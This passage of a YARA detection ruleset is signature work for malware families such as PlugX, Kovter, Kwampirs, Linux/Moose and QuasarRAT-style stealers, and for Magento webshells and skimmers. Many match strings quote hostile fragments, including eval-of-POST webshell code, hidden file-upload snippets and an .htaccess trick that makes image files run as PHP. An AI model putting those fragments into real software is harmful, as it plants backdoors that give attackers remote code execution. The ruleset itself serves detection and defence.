( 5 of ($s*) or 6 of ($x*) or ( 4 of ($s*) and 4 of ($x*) ) ) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule korlia { meta: author = "Nick Hoffman" company = "Morphick" reference = "http://www.morphick.com/resources/lab-blog/curious-korlia" information = "korlia malware found in apt dump" //case a //b2 1f mov dl, 0x1f ; mov key (wildcard) // ----------------- //8A 86 98 40 00 71 mov al, byte ptr url[esi] //BF 98 40 00 71 mov edi, offset url //32 C2 xor al, dl //83 C9 FF or ecx, 0FFFFFFFFh //88 86 98 40 00 71 mov byte ptr url[esi], al //33 C0 xor eax, eax //46 inc esi //F2 AE repne scasb //F7 D1 not ecx //49 dec ecx //3B F1 cmp esi, ecx //72 DE jb short loc_71001DE0 //case b (variant of loop a) //8A 8A 28 50 40 00 mov cl, byte_405028[edx] //BF 28 50 40 00 mov edi, offset byte_405028 //32 CB xor cl, bl //33 C0 xor eax, eax //88 8A 28 50 40 00 mov byte_405028[edx], cl //83 C9 FF or ecx, 0FFFFFFFFh //42 inc edx //F2 AE repne scasb //F7 D1 not ecx //49 dec ecx //3B D1 cmp edx, ecx //72 DE jb short loc_4047F2 //case c (not a variant of the above loop) //8A 0C 28 mov cl, [eax+ebp] //80 F1 28 xor cl, 28h //88 0C 28 mov [eax+ebp], cl //8B 4C 24 14 mov ecx, [esp+0D78h+var_D64] //40 inc eax //3B C1 cmp eax, ecx //7C EE jl short loc_404F1C strings: $a = {b2 ?? 8A 86 98 40 00 71 BF 98 40 00 71 32 c2 83 C9 FF 88 86 98 40 00 71 33 C0 46 F2 AE F7 D1 49 3B F1} $b = {B3 ?? ?? ?? 8A 8A 28 50 40 00 BF 28 50 40 00 32 CB 33 C0 88 8A 28 50 40 00 83 C9 FF 42 F2 AE F7 D1 49 3B D1} $c = {8A 0C 28 80 F1 ?? 88 0C 28 8B 4C 24 14 40 3B C1} $d = {00 62 69 73 6F 6E 61 6C 00} //config marker "\x00bisonal\x00" condition: any of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Korplug_FAST { meta: description = "Rule to detect Korplug/PlugX FAST variant" author = "Florian Roth" date = "2015-08-20" hash = "c437465db42268332543fbf6fd6a560ca010f19e0fd56562fb83fb704824b371" strings: $x1 = "%s\\rundll32.exe \"%s\", ShadowPlay" fullword ascii $a1 = "ShadowPlay" fullword ascii $s1 = "%s\\rundll32.exe \"%s\"," fullword ascii $s2 = "nvdisps.dll" fullword ascii $s3 = "%snvdisps.dll" fullword ascii $s4 = "\\winhlp32.exe" fullword ascii $s5 = "nvdisps_user.dat" fullword ascii $s6 = "%snvdisps_user.dat" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 500KB and ( $x1 or ($a1 and 1 of ($s*)) or 4 of ($s*) ) } rule Korplug { meta: maltype = "Korplug Backdoor" author = "https://github.com/reed1713" reference = "http://www.symantec.com/connect/blogs/new-sample-backdoorkorplug-signed-stolen-certificate" description = "IOC looks for events associated with the KORPLUG Backdoor linked to the recent operation greedy wonk activity." strings: $type="Microsoft-Windows-Security-Auditing" $eventid="4688" $data="ProgramData\\RasTls\\RasTls.exe" $type1="Microsoft-Windows-Security-Auditing" $eventid1="4688" $data1="ProgramData\\RasTls\\rundll32.exe" $type2="Microsoft-Windows-Security-Auditing" $eventid2="4688" $data2="ProgramData\\RasTls\\svchost.exe" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Kovter { meta: maltype = "Kovter" reference = "http://blog.airbuscybersecurity.com/post/2016/03/FILELESS-MALWARE-%E2%80%93-A-BEHAVIOURAL-ANALYSIS-OF-KOVTER-PERSISTENCE" date = "9-19-2016" description = "fileless malware" strings: $type="Microsoft-Windows-Security-Auditing" wide ascii $eventid="4688" wide ascii $data="Windows\\System32\\regsvr32.exe" wide ascii $type1="Microsoft-Windows-Security-Auditing" wide ascii $eventid1="4689" wide ascii $data1="Windows\\System32\\mshta.exe" wide ascii $type2="Microsoft-Windows-Security-Auditing" wide ascii $eventid2="4689" wide ascii $data2="Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" wide ascii $type3="Microsoft-Windows-Security-Auditing" wide ascii $eventid3="4689" wide ascii $data3="Windows\\System32\\wbem\\WmiPrvSE.exe" wide ascii condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Kraken_Bot_Sample : bot { meta: description = "Kraken Bot Sample - file inf.bin" author = "Florian Roth" reference = "https://blog.gdatasoftware.com/blog/article/dissecting-the-kraken.html" date = "2015-05-07" hash = "798e9f43fc199269a3ec68980eb4d91eb195436d" score = 90 strings: $s2 = "%s=?getname" fullword ascii $s4 = "&COMPUTER=^" fullword ascii $s5 = "xJWFwcGRhdGElAA=" fullword ascii /* base64 encoded string '%appdata%' */ $s8 = "JVdJTkRJUi" fullword ascii /* base64 encoded string '%WINDIR' */ $s20 = "btcplug" fullword ascii condition: uint16(0) == 0x5a4d and all of them } rule Kwampirs { meta: copyright = "Symantec" reference = "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia" family = "Kwampirs" description = "Kwampirs dropper and main payload components" strings: $pubkey = { 06 02 00 00 00 A4 00 00 52 53 41 31 00 08 00 00 01 00 01 00 CD 74 15 BC 47 7E 0A 5E E4 35 22 A5 97 0C 65 BE E0 33 22 F2 94 9D F5 40 97 3C 53 F9 E4 7E DD 67 CF 5F 0A 5E F4 AD C9 CF 27 D3 E6 31 48 B8 00 32 1D BE 87 10 89 DA 8B 2F 21 B4 5D 0A CD 43 D7 B4 75 C9 19 FE CC 88 4A 7B E9 1D 8C 11 56 A6 A7 21 D8 C6 82 94 C1 66 11 08 E6 99 2C 33 02 E2 3A 50 EA 58 D2 A7 36 EE 5A D6 8F 5D 5D D2 9E 04 24 4A CE 4C B6 91 C0 7A C9 5C E7 5F 51 28 4C 72 E1 60 AB 76 73 30 66 18 BE EC F3 99 5E 4B 4F 59 F5 56 AD 65 75 2B 8F 14 0C 0D 27 97 12 71 6B 49 08 84 61 1D 03 BA A5 42 92 F9 13 33 57 D9 59 B3 E4 05 F9 12 23 08 B3 50 9A DA 6E 79 02 36 EE CE 6D F3 7F 8B C9 BE 6A 7E BE 8F 85 B8 AA 82 C6 1E 14 C6 1A 28 29 59 C2 22 71 44 52 05 E5 E6 FE 58 80 6E D4 95 2D 57 CB 99 34 61 E9 E9 B3 3D 90 DC 6C 26 5D 70 B4 78 F9 5E C9 7D 59 10 61 DF F7 E4 0C B3 } $network_xor_key = { B7 E9 F9 2D F8 3E 18 57 B9 18 2B 1F 5F D9 A5 38 C8 E7 67 E9 C6 62 9C 50 4E 8D 00 A6 59 F8 72 E0 91 42 FF 18 A6 D1 81 F2 2B C8 29 EB B9 87 6F 58 C2 C9 8E 75 3F 71 ED 07 D0 AC CE 28 A1 E7 B5 68 CD CF F1 D8 2B 26 5C 31 1E BC 52 7C 23 6C 3E 6B 8A 24 61 0A 17 6C E2 BB 1D 11 3B 79 E0 29 75 02 D9 25 31 5F 95 E7 28 28 26 2B 31 EC 4D B3 49 D9 62 F0 3E D4 89 E4 CC F8 02 41 CC 25 15 6E 63 1B 10 3B 60 32 1C 0D 5B FA 52 DA 39 DF D1 42 1E 3E BD BC 17 A5 96 D9 43 73 3C 09 7F D2 C6 D4 29 83 3E 44 44 6C 97 85 9E 7B F0 EE 32 C3 11 41 A3 6B A9 27 F4 A3 FB 2B 27 2B B6 A6 AF 6B 39 63 2D 91 75 AE 83 2E 1E F8 5F B5 65 ED B3 40 EA 2A 36 2C A6 CF 8E 4A 4A 3E 10 6C 9D 28 49 66 35 83 30 E7 45 0E 05 ED 69 8D CF C5 40 50 B1 AA 13 74 33 0F DF 41 82 3B 1A 79 DC 3B 9D C3 BD EA B1 3E 04 33 } $decrypt_string = { 85 DB 75 09 85 F6 74 05 89 1E B0 01 C3 85 FF 74 4F F6 C3 01 75 4A 85 F6 74 46 8B C3 D1 E8 33 C9 40 BA 02 00 00 00 F7 E2 0F 90 C1 F7 D9 0B C8 51 E8 12 28 00 00 89 06 8B C8 83 C4 04 33 C0 85 DB 74 16 8B D0 83 E2 0F 8A 92 1C 33 02 10 32 14 38 40 88 11 41 3B C3 72 EA 66 C7 01 00 00 B0 01 C3 32 C0 C3 } $init_strings = { 55 8B EC 83 EC 10 33 C9 B8 0D 00 00 00 BA 02 00 00 00 F7 E2 0F 90 C1 53 56 57 F7 D9 0B C8 51 E8 B3 27 00 00 BF 05 00 00 00 8D 77 FE BB 4A 35 02 10 2B DE 89 5D F4 BA 48 35 02 10 4A BB 4C 35 02 10 83 C4 04 2B DF A3 C8 FC 03 10 C7 45 FC 00 00 00 00 8D 4F FC 89 55 F8 89 5D F0 EB 06 } condition: 2 of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule LURK0Header : Family LURK0 { meta: description = "5 char code for LURK0" author = "Katie Kleemola" last_updated = "07-21-2014" strings: $ = { C6 [5] 4C C6 [5] 55 C6 [5] 52 C6 [5] 4B C6 [5] 30 } condition: any of them } rule CCTV0Header : Family CCTV0 { meta: description = "5 char code for LURK0" author = "Katie Kleemola" last_updated = "07-21-2014" strings: //if its just one char a time $ = { C6 [5] 43 C6 [5] 43 C6 [5] 54 C6 [5] 56 C6 [5] 30 } // bit hacky but for when samples dont just simply mov 1 char at a time $ = { B0 43 88 [3] 88 [3] C6 [3] 54 C6 [3] 56 [0-12] (B0 30 | C6 [3] 30) } condition: any of them } rule SharedStrings : Family { meta: description = "Internal names found in LURK0/CCTV0 samples" author = "Katie Kleemola" last_updated = "07-22-2014" strings: // internal names $i1 = "Butterfly.dll" $i2 = /\\BT[0-9.]+\\ButterFlyDLL\\/ $i3 = "ETClientDLL" // dbx $d1 = "\\DbxUpdateET\\" wide $d2 = "\\DbxUpdateBT\\" wide $d3 = "\\DbxUpdate\\" wide // other folders $mc1 = "\\Micet\\" // embedded file names $n1 = "IconCacheEt.dat" wide $n2 = "IconConfigEt.dat" wide $m1 = "\x00\x00ERXXXXXXX\x00\x00" wide $m2 = "\x00\x00111\x00\x00" wide $m3 = "\x00\x00ETUN\x00\x00" wide $m4 = "\x00\x00ER\x00\x00" wide condition: any of them //todo: finetune this } rule LURK0 : Family LURK0 { meta: description = "rule for lurk0" author = "Katie Kleemola" last_updated = "07-22-2014" condition: LURK0Header and SharedStrings } rule CCTV0 : Family CCTV0 { meta: description = "rule for cctv0" author = "Katie Kleemola" last_updated = "07-22-2014" condition: CCTV0Header and SharedStrings } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule lateral_movement { meta: date = "3/12/2014" author = "https://github.com/reed1713" description = "methodology sig looking for signs of lateral movement" strings: $type="Microsoft-Windows-Security-Auditing" $eventid="4688" $data="PsExec.exe" $type1="Microsoft-Windows-Security-Auditing" $eventid1="4688" $data1="Windows\\System32\\net.exe" $type2="Microsoft-Windows-Security-Auditing" $eventid2="4688" $data2="Windows\\System32\\at.exe" condition: ($type and $eventid and $data) or ($type1 and $eventid1 and $data1) or ($type2 and $eventid2 and $data2) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" /* LENOVO Superfish -------------------------------------------------------- */ rule VisualDiscovery_Lonovo_Superfish_SSL_Hijack { meta: description = "Lenovo Superfish SSL Interceptor - file VisualDiscovery.exe" author = "Florian Roth / improved by kbandla" reference = "https://twitter.com/4nc4p/status/568325493558272000" date = "2015/02/19" hash1 = "99af9cfc7ab47f847103b5497b746407dc566963" hash2 = "f0b0cd0227ba302ac9ab4f30d837422c7ae66c46" hash3 = "f12edf2598d8f0732009c5cd1df5d2c559455a0b" hash4 = "343af97d47582c8150d63cbced601113b14fcca6" strings: $mz = { 4d 5a } //$s1 = "VisualDiscovery.exe" fullword wide $s2 = "Invalid key length used to initialize BlowFish." fullword ascii $s3 = "GetPCProxyHandler" fullword ascii $s4 = "StartPCProxy" fullword ascii $s5 = "SetPCProxyHandler" fullword ascii condition: ( $mz at 0 ) and filesize < 2MB and all of ($s*) } rule LinuxBew: MALW { meta: description = "Linux.Bew Backdoor" author = "Joan Soriano / @w0lfvan" date = "2017-07-10" version = "1.0" MD5 = "27d857e12b9be5d43f935b8cc86eaabf" SHA256 = "80c4d1a1ef433ac44c4fe72e6ca42395261fbca36eff243b07438263a1b1cf06" strings: $a = "src/secp256k1.c" $b = "hfir.u230.org" $c = "tempfile-x11session" condition: all of them } rule LinuxHelios: MALW { meta: description = "Linux.Helios" author = "Joan Soriano / @w0lfvan" date = "2017-10-19" version = "1.0" MD5 = "1a35193f3761662a9a1bd38b66327f49" SHA256 = "72c2e804f185bef777e854fe86cff3e86f00290f32ae8b3cb56deedf201f1719" strings: $a = "LIKE A GOD!!! IP:%s User:%s Pass:%s" $b = "smack" $c = "PEACE OUT IMMA DUP\n" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ // Linux/Moose yara rules // For feedback or questions contact us at: github@eset.com // https://github.com/eset/malware-ioc/ // // These yara rules are provided to the community under the two-clause BSD // license as follows: // // Copyright (c) 2015, ESET // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are met: // // 1. Redistributions of source code must retain the above copyright notice, this // list of conditions and the following disclaimer. // // 2. Redistributions in binary form must reproduce the above copyright notice, // this list of conditions and the following disclaimer in the documentation // and/or other materials provided with the distribution. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE // DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE // FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL // DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER // CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, // OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE // OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. // private rule is_elf { strings: $header = { 7F 45 4C 46 } condition: $header at 0 } rule moose { meta: Author = "Thomas Dupuy" Date = "2015/04/21" Description = "Linux/Moose malware" Reference = "http://www.welivesecurity.com/wp-content/uploads/2015/05/Dissecting-LinuxMoose.pdf" Source = "https://github.com/eset/malware-ioc/" Contact = "github@eset.com" License = "BSD 2-Clause" strings: $s0 = "Status: OK" $s1 = "--scrypt" $s2 = "stratum+tcp://" $s3 = "cmd.so" $s4 = "/Challenge" $s7 = "processor" $s9 = "cpu model" $s21 = "password is wrong" $s22 = "password:" $s23 = "uthentication failed" $s24 = "sh" $s25 = "ps" $s26 = "echo -n -e " $s27 = "chmod" $s28 = "elan2" $s29 = "elan3" $s30 = "chmod: not found" $s31 = "cat /proc/cpuinfo" $s32 = "/proc/%s/cmdline" $s33 = "kill %s" condition: is_elf and all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule lost_door : Trojan { meta: author="Kevin Falcoz" date="23/02/2013" description="Lost Door" strings: $signature1={45 44 49 54 5F 53 45 52 56 45 52} /*EDIT_SERVER*/ condition: $signature1 } rule LuaBot : MALW { meta: description = "LuaBot" author = "Joan Soriano / @joanbtl" date = "2017-06-07" version = "1.0" MD5 = "9df3372f058874fa964548cbb74c74bf" SHA1 = "89226865501ee7d399354656d870b4a9c02db1d3" ref1 = "http://blog.malwaremustdie.org/2016/09/mmd-0057-2016-new-elf-botnet-linuxluabot.html" strings: $a = "LUA_PATH" $b = "Hi. Happy reversing, you can mail me: luabot@yandex.ru" $c = "/tmp/lua_XXXXXX" $d = "NOTIFY" $e = "UPDATE" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule LuckyCatCode : LuckyCat Family { meta: description = "LuckyCat code tricks" author = "Seth Hardy" last_modified = "2014-06-19" strings: $xordecrypt = { BF 0F 00 00 00 F7 F7 ?? ?? ?? ?? 32 14 39 80 F2 7B } $dll = { C6 ?? ?? ?? 64 C6 ?? ?? ?? 6C C6 ?? ?? ?? 6C } $commonletters = { B? 63 B? 61 B? 73 B? 65 } condition: $xordecrypt or ($dll and $commonletters) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule MSILStealer { meta: description = "Detects strings from C#/VB Stealers and QuasarRat" reference = "https://github.com/quasar/QuasarRAT" author = "https://github.com/hwvs" last_modified = "2019-11-21" strings: $ = "Firefox does not have any profiles, has it ever been launched?" wide ascii $ = "Firefox is not installed, or the install path could not be located" wide ascii $ = "No installs of firefox recorded in its key." wide ascii $ = "{0}\\\\FileZilla\\\\recentservers.xml" wide ascii $ = "{1}{0}Cookie Name: {2}{0}Value: {3}{0}Path" wide ascii $ = "[PRIVATE KEY LOCATION: \\\"{0}\\\"]" wide ascii condition: 1 of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule MacControlCode : MacControl Family { meta: description = "MacControl code tricks" author = "Seth Hardy" last_modified = "2014-06-17" strings: // Load these function strings 4 characters at a time. These check the first two blocks: $L4_Accept = { C7 ?? 41 63 63 65 C7 ?? 04 70 74 3A 20 } $L4_AcceptLang = { C7 ?? 41 63 63 65 C7 ?? 04 70 74 2D 4C } $L4_Pragma = { C7 ?? 50 72 61 67 C7 ?? 04 6D 61 3A 20 } $L4_Connection = { C7 ?? 43 6F 6E 6E C7 ?? 04 65 63 74 69 } $GEThgif = { C7 ?? 47 45 54 20 C7 ?? 04 2F 68 2E 67 } condition: all of ($L4*) or $GEThgif } rule MacControlStrings : MacControl Family { meta: description = "MacControl Identifying Strings" author = "Seth Hardy" last_modified = "2014-06-17" strings: $ = "HTTPHeadGet" $ = "/Library/launched" $ = "My connect error with no ip!" $ = "Send File is Failed" $ = "****************************You Have got it!****************************" condition: any of them } rule MacControl : Family { meta: description = "MacControl" author = "Seth Hardy" last_modified = "2014-06-16" condition: MacControlCode or MacControlStrings } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule MacGyverCap : MacGyver { meta: description = "Generic rule for MacGyver.cap" author = "xylitol@temari.fr" date = "2021-05-11" reference = "https://github.com/fboldewin/MacGyver-s-return---An-EMV-Chip-cloning-case/blob/master/MacGyver's%20return%20-%20An%20EMV%20Chip%20cloning%20case.pdf" // May only the challenge guide you hash1 = "9dc70002e82c78ee34c813597925c6cf8aa8d68b7e9ce5bcc70ea9bcab9dbf4a" strings: $string1 = "src/MacGyver/javacard/Header.cap" ascii wide $string2 = "src/MacGyver/javacard/Directory.cap" ascii wide $string3 = "src/MacGyver/javacard/Applet.cap" ascii wide $string4 = "src/MacGyver/javacard/Import.cap" ascii wide $string5 = "src/MacGyver/javacard/ConstantPool.cap" ascii wide $string6 = "src/MacGyver/javacard/Class.cap" ascii wide $string7 = "src/MacGyver/javacard/Method.cap" ascii wide condition: all of them } rule MacGyverCapInstaller : MacGyvercap Installer { meta: description = "Generic rule for Hacktool:Win32/EMVSoft who install MacGyver.cap" author = "xylitol@temari.fr" date = "2021-05-11" reference = "https://github.com/fboldewin/MacGyver-s-return---An-EMV-Chip-cloning-case/blob/master/MacGyver's%20return%20-%20An%20EMV%20Chip%20cloning%20case.pdf" // May only the challenge guide you hash1 = "bb828eb0bbebabbcb51f490f4a0c08dd798b1f350dddddb6c00abcb6f750069f" hash2 = "04f0c9904675c7cf80ff1962bec5ef465ccf8c29e668f3158ec262414a6cc6eb" hash3 = "7335cd56a9ac08c200cca7e25b939e9c4ffa4d508207e68bee01904bf20a6528" hash4 = "af542ccb415647dbd80df902858a3d150a85f37992a35f29999eed76ac01a12b" hash5 = "247484124f4879bfacaae73ea32267e2c1e89773986df70a5f3456b1fb944c58" hash6 = "1cc8a2f3ce12f4b8356bda8b4aaf61d510d1078112af1c14cf4583090e062fbe" hash7 = "c23411deeec790e2dba37f4c49c7ecac3c867b7012431c9281ed748519eda65c" hash8 = "c0d11ed2eed0fef8d2f53920a1e12f667e03eafdb2d2941473d120e9e6f0e657" hash9 = "1ecfd3755eba578108363c0705c6ec205972080739ed0fbd17439f8139ba7e08" hash10 = "87678c6dcf0065ffc487a284b9f79bd8c0815c5c621fc92f83df24393bfcc660" strings: $string1 = "delete -AID 315041592e5359532e4444463031" ascii wide $string2 = "install -file MacGyver.cap -nvDataLimit 1000 -instParam 00 -priv 4" ascii wide $string3 = "-mac_key 404142434445464748494a4b4c4d4e4f" ascii wide $string4 = "-enc_key 404142434445464748494a4b4c4d4e4f" ascii wide condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Madness : DoS { meta: author = "Jason Jones <jasonjones@arbor.net>" date = "2014-01-15" description = "Identify Madness Pro DDoS Malware" source = "https://github.com/arbor/yara/blob/master/madness.yara" strings: $ua1 = "TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MS44LjAuNSkgR2Vja28vMjAwNjA3MzEgRmlyZWZveC8xLjUuMC41IEZsb2NrLzAuNy40LjE" $ua2 = "TW96aWxsYS81LjAgKFgxMTsgVTsgTGludXggMi40LjItMiBpNTg2OyBlbi1VUzsgbTE4KSBHZWNrby8yMDAxMDEzMSBOZXRzY2FwZTYvNi4wMQ==" $str1= "document.cookie=" fullword $str2 = "[\"cookie\",\"" fullword $str3 = "\"realauth=" fullword $str4 = "\"location\"];" fullword $str5 = "d3Rm" fullword $str6 = "ZXhl" fullword condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* ref : https://github.com/gwillem/magento-malware-scanner/blob/master/rules/backend.yar author : https://github.com/gwillem */ rule dump_sales_quote_payment { strings: $ = "include '../../../../../../../../../../app/Mage.php'; Mage::app(); $q = Mage::getModel('sales/quote_payment')->getCollection();" condition: any of them } rule dump_sales_order { strings: $ = "../../../../../../app/Mage.php'; Mage::app(); var_dump(Mage::getModel('sales/order')" condition: any of them } rule md5_64651cede2467fdeb1b3b7e6ff3f81cb { strings: $ = "rUl6QttVEP5eqf9usxfJjgoOvdNWFSGoHDgluk+4ONwXQNbGniQLttfyrgkB8d9" condition: any of them } rule md5_6bf4910b01aa4f296e590b75a3d25642 { strings: $ = "base64_decode('b25lcGFnZXxnY19hZG1pbg==')" condition: any of them } rule fopo_webshell { strings: $ = "DNEcHdQbWtXU3dSMDA1VmZ1c29WUVFXdUhPT0xYb0k3ZDJyWmFVZlF5Y0ZEeHV4K2FnVmY0OUtjbzhnc0" $ = "U3hkTVVibSt2MTgyRjY0VmZlQWo3d1VlaFJVNVNnSGZUVUhKZXdEbGxJUTlXWWlqWSt0cEtacUZOSXF4c" $ = "rb2JHaTJVdURMNlhQZ1ZlTGVjVnFobVdnMk5nbDlvbEdBQVZKRzJ1WmZUSjdVOWNwWURZYlZ0L1BtNCt" condition: any of them } rule eval_post { strings: $ = "eval(base64_decode($_POST" $ = "eval($undecode($tongji))" $ = "eval($_POST" condition: any of them } rule spam_mailer { strings: $ = "<strong>WwW.Zone-Org</strong>" $ = "echo eval(urldecode(" condition: any of them } rule md5_0105d05660329704bdb0ecd3fd3a473b { /* )){eval (${ $njap58}['q9e5e25' ]) ) ) { eval ( ${$yed7 }[' */ strings: $ = /\)\s*\)\s*\{\s*eval\s*\(\s*\$\{/ condition: any of them } rule md5_0b1bfb0bdc7e017baccd05c6af6943ea { /* eval(hnsqqh($llmkuhieq, $dbnlftqgr));?> eval(vW91692($v7U7N9K, $v5N9NGE));?> */ strings: $ = /eval\([\w\d]+\(\$[\w\d]+, \$[\w\d]+\)\);/ condition: any of them } rule md5_2495b460f28f45b40d92da406be15627 { strings: $ = "$dez = $pwddir.\"/\".$real;copy($uploaded, $dez);" condition: any of them } rule md5_2c37d90dd2c9c743c273cb955dd83ef6 { strings: $ = "@$_($_REQUEST['" condition: any of them } rule md5_3ccdd51fe616c08daafd601589182d38 { strings: $ = "eval(xxtea_decrypt" condition: any of them } rule md5_4b69af81b89ba444204680d506a8e0a1 { strings: $ = "** Scam Redirector" condition: any of them } rule md5_71a7c769e644d8cf3cf32419239212c7 { /* // $GLOBALS['ywanc2']($GLOBALS['ggbdg61'] */ strings: $ = /\$GLOBALS\['[\w\d]+'\]\(\$GLOBALS\['[\w\d]+'\]/ condition: any of them } rule md5_825a3b2a6abbe6abcdeda64a73416b3d { /* // $ooooo00oo0000oo0oo0oo00ooo0ooo0o0o0 = gethostbyname($_SERVER["SERVER_NAME"]); // if(!oo00o0OOo0o00O("fsockopen")) // strings: $ = "$ooooo00oo0000oo0" */ strings: $ = /[o0O]{3}\("fsockopen"\)/ condition: any of them } rule md5_87cf8209494eedd936b28ff620e28780 { strings: $ = "curl_close($cu);eval($o);};die();" condition: any of them } rule md5_9b59cb5b557e46e1487ef891cedaccf7 { strings: $jpg = { FF D8 FF E0 ?? ?? 4A 46 49 46 00 01 } /* // https://en.wikipedia.org/wiki/List_of_file_signatures // magic module is not standard compiled in on our platform // otherwise: condition: magic.mime_type() == /^image/ // $jpg = { 4A 46 49 46 00 01 } */ $php = "<?php" condition: ($jpg at 0) and $php } rule md5_c647e85ad77fd9971ba709a08566935d { strings: $ = "fopen(\"cache.php\", \"w+\")" condition: any of them } rule md5_fb9e35bf367a106d18eb6aa0fe406437 { strings: $ = "0B6KVua7D2SLCNDN2RW1ORmhZRWs/sp_tilang.js" condition: any of them } rule md5_8e5f7f6523891a5dcefcbb1a79e5bbe9 { strings: $ = "if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])) {echo '<b>up!!!</b><br><br>';}}" condition: any of them } rule indoexploit_autoexploiter { strings: $ = "echo \"IndoXploit - Auto Xploiter\"" condition: any of them } rule eval_base64_decode_a { strings: $ = "eval(base64_decode($a));" condition: any of them } rule obfuscated_eval { strings: $ = /\\x65\s*\\x76\s*\\x61\s*\\x6C/ $ = "\"/.*/e\"" condition: any of them } rule md5_50be694a82a8653fa8b31d049aac721a { strings: $ = "(preg_match('/\\/admin\\/Cms_Wysiwyg\\/directive\\/index\\//', $_SERVER['REQUEST_URI']))" condition: any of them } rule md5_ab63230ee24a988a4a9245c2456e4874 { strings: $ = "eval(gzinflate(base64_decode(str_rot13(strrev(" condition: any of them } rule md5_b579bff90970ec58862ea8c26014d643 { /* forces php execution of image files, dropped in an .htaccess file under media */ strings: $ = /<Files [^>]+.(jpg|png|gif)>\s*ForceType application\/x-httpd-php/ condition: any of them } rule md5_d30b23d1224438518d18e90c218d7c8b { strings: $ = "attribute_code=0x70617373776f72645f68617368" condition: any of them } rule md5_24f2df1b9d49cfb02d8954b08dba471f { strings: $ = "))unlink('../media/catalog/category/'.basename($" condition: any of them } rule base64_hidden_in_image { strings: $ = /JPEG-1\.1[a-zA-Z0-9\-\/]{32}/ condition: any of them } rule hide_data_in_jpeg { strings: $ = /file_put_contents\(\$.{2,3},'JPEG-1\.1'\.base64_encode/ condition: any of them } rule hidden_file_upload_in_503 { strings: $ = /error_reporting\(0\);\$f=\$_FILES\[\w+\];copy\(\$f\[tmp_name\],\$f\[name\]\);error_reporting\(E_ALL\);/ condition: any of them } rule md5_fd141197c89d27b30821f3de8627ac38 { strings: $ = "if(isset($_GET['do'])){$g0='adminhtml/default/default/images'" condition: any of them } rule visbot { strings: $ = "stripos($buf, 'Visbot')!==false && stripos($buf, 'Pong')!==false" $ = "stripos($buf, 'Visbot') !== false && stripos($buf, 'Pong')" condition: any of them } rule md5_39ca2651740c2cef91eb82161575348b { strings: $ = /if\(md5\(@\$_COOKIE\[..\]\)=='.{32}'\) \(\$_=@\$_REQUEST\[.\]\).@\$_\(\$_REQUEST\[.\]\);/ condition: any of them } rule md5_4c4b3d4ba5bce7191a5138efa2468679 { strings: $ = "<?PHP /*** Magento** NOTICE OF LICENSE** This source file is subject to the Open Software License (OSL 3.0)* that is bundled with this package in the file LICENSE.txt.* It is also available through the world-wide-web at this URL:* http://opensource.org/licenses/osl-3.0.php**/$" $ = "$_SERVER['HTTP_USER_AGENT'] == 'Visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;bot@visvo.com)'" condition: any of them } rule md5_6eb201737a6ef3c4880ae0b8983398a9 { strings: $ = "if(md5(@$_COOKIE[qz])==" $ = 